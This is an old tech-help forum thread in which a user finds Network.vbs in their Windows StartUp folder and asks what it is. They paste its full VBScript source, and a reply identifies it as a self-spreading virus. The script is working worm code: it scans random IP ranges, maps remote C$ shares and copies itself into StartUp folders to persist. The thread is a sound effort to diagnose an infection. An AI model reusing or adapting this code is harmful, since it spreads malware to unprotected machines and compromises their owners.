Solved

Network.exe found in StartUp

Posted on 2000-04-25
2
247 Views
Last Modified: 2010-08-05
I have an unattended computer with a fixed internet connection. I run NetMeeting so I can connect to this computer via the Internet, and I also run the dial-up server to allow me to connect by phone. Recently I found two files appeared on my StartUp directory - Network.exe and Network.VBS. These programs are causing problem to my NetMeeting connections everytime the computer is reboot. If I delete them, they will write themselves back while the computer is not accessed. It also writes a log file (Network.log) onto my bootup disk, with the content of a subnet address. It appears that the file Network.VBS is doing the job of logging and rewriting itself back, onto both the StartUP and Windows directory.

My quetion is: Where could this script possibly come from? For What purpose? What fuction does the Network.exe do?Could it be someone knowing my IP address put them in so he can access my files?

The script is as follows:

dim octa
dim octb
dim octc
dim octd
dim rand
dim dot
dim driveconnected
dim sharename
dim count
dim myfile
count = "0"
dot = "."
driveconnected="0"
set wshnetwork = wscript.createobject("wscript.network")
Set fso1 = createobject("scripting.filesystemobject")
set fso2 = createobject("scripting.filesystemobject")
on error resume next
randomize
checkfile()
randaddress()

do
do while driveconnected = "0"
checkaddress()
shareformat()
wshnetwork.mapnetworkdrive "j:", sharename
enumdrives()
loop
copyfiles()
disconnectdrive()
loop

msgbox "Done"

function disconnectdrive()
wshnetwork.removenetworkdrive "j:"
driveconnected = "0"
end function

function createlogfile()
Set myfile = fso1.createtextfile("c:\network.log", True)
end function

function checkfile()
If (fso1.fileexists("c:\network.log")) then
fso1.deletefile("c:\network.log")
createlogfile()
else
createlogfile()
end If
myfile.writeLine("Log file Open")
end function

function copyfiles()
myfile.writeline("Copying files to  :  " & sharename)
Set fso = CreateObject("scripting.filesystemobject")

fso.copyfile "c:\network.vbs", "j:\"

If (fso2.FileExists("j:\network.vbs")) Then
myfile.writeline("Successfull copy to  :  " & sharename)
End If  

fso.copyfile "c:\network.vbs", "j:\windows\startm~1\programs\startup\"

fso.copyfile "c:\network.vbs", "j:\windows\"

fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"

fso.copyfile "c:\network.vbs", "j:\win95\start menu\programs\startup\"

fso.copyfile "c:\network.vbs", "j:\win95\startm~1\programs\startup\"

fso.copyfile "c:\network.vbs", "j:\wind95\"

end function

function checkaddress()
octd = octd + 1
if octd = "255" then randaddress()
end function

function shareformat()
sharename = "\\" & octa & dot & octb & dot & octc & dot & octd & "\C"
end function

function enumdrives()
Set odrives = wshnetwork.enumnetworkdrives
For i = 0 to odrives.Count -1
if sharename = odrives.item(i) then
driveconnected = 1
else
' driveconnected = 0
end if
Next
end function

function randum()
rand = int((254 * rnd) + 1)
end function

function randaddress()
if count < 50 then
octa=Int((16) * Rnd + 199)
count=count + 1
else
randum()
octa= rand
end if
randum()
octb=rand
randum()
octc=rand
octd="1"
myfile.writeLine("Subnet  :  " & octa & dot & octb & dot & octc & dot & "0")
end function

0
Comment
Question by:Ellee
2 Comments
 
LVL 2

Accepted Solution

by:
estest earned 100 total points
Comment Utility
I just removed this from a couple of machines that I have on a network that I manage.

It is a virus, that maps drives on your network, transfers itself. (replicates) and then disconnects the drive.
This caused errors on some of the machines that I have, and that's how I discovered it.

There is no known payload for this virus, and it shouldn't be dangerous.

I removed the files that I felt were added by the virus, and haven't had any trouble since.

Tim

0
 
LVL 1

Author Comment

by:Ellee
Comment Utility
Thanks, Tim!
0

Featured Post

What Should I Do With This Threat Intelligence?

Are you wondering if you actually need threat intelligence? The answer is yes. We explain the basics for creating useful threat intelligence.

Join & Write a Comment

Join Greg Farro and Ethan Banks from Packet Pushers (http://packetpushers.net/podcast/podcasts/pq-show-93-smart-network-monitoring-paessler-sponsored/) and Greg Ross from Paessler (https://www.paessler.com/prtg) for a discussion about smart network …
If you're not part of the solution, you're part of the problem.   Tips on how to secure IoT devices, even the dumbest ones, so they can't be used as part of a DDoS botnet.  Use PRTG Network Monitor as one of the building blocks, to detect unusual…
Here's a very brief overview of the methods PRTG Network Monitor (https://www.paessler.com/prtg) offers for monitoring bandwidth, to help you decide which methods you´d like to investigate in more detail.  The methods are covered in more detail in o…
In this tutorial you'll learn about bandwidth monitoring with flows and packet sniffing with our network monitoring solution PRTG Network Monitor (https://www.paessler.com/prtg). If you're interested in additional methods for monitoring bandwidt…

772 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question

Need Help in Real-Time?

Connect with top rated Experts

11 Experts available now in Live!

Get 1:1 Help Now